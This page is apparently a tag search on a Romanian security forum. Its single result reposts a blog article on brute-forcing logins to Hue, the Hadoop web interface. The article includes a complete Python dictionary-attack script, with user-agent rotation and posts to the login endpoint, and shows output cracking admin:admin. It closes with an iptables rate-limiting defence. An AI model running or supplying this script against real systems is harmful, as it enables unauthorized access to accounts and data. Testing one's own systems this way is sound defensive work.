Jump to content

Search the Community

Showing results for tags 'hue'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. The term “Big Data” has been flinging around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the internet of things. These things all will produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was birthed as an open source project from the Google filesystem (GFS), and Map Reduce white-papers; the creator is Doug Cutting and the open source community. Map reduce is the core of Hadoop, and allows the user to write very simple programs to distribute workload across a complex amount of data. The Google filesystem inspired the majority of the work for the open source Hadoop filesystem (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines that can be analyzed using Map reduce programming. That is just a brief dive into what Hadoop is, and if you want to learn more I highly recommend you take a gander at the Yahoo Hadoop tutorial. Here is an ecosystem filled with projects that make managing this complex monster easier on administrator’s and developer’s. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives a web interface for the user to query their data using some of these projects that live in this big data ecosystem like: Hive Pig Oozie Impala Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being — Hue has access to some seriously valuable information. As with most technologies, security is often an after-thought. It is important we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell the same information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason that I have picked Hue as an example of a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Lets crack some Hue accounts! Of course in this article I’m using a Virtual Machine and not testing on live systems in the wild. That would be highly unethical…but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks — much like children stories about being good or the boogie man will get you. So, I decided to test the limits and see how easy it would be to crack into a Hue account using old school methods of brute-forcing. As a standard bad practice people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account. ~$ ./hute.py .... .... .... .... .... .... .... .... .... .... .... Success! admin:admin Completed attack at 2014-09-30 16:19:55.113608 Here is the source code for those who care and would like to test their own systems using the same methods in this proof of concept. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", print datetime.datetime.now() What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two factor auth within django. What we can do is protect Hue with some iptables magic. We can use iptables’ recent module to keep an eye out for shady traffic and to act on that traffic: $ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP ~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set Above when we have more than 10 immediate hits we will drop the incoming traffic for 30 seconds, thus thwarting any effective bruteforce attempt. It is not full-proof, but definitely going to put a dent in most bruteforce attacks on Hue. The point of this article is to not shame Hue by any means, but to shine light on security in this emerging space. Unfortunately the issue of bruteforce is an age old concern. The developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle this around all we want, but only a few lines of code to save the user from hanging themselves — which is the job of the developer. These security lessons have been learned time and time again Source
×
×
  • Create New...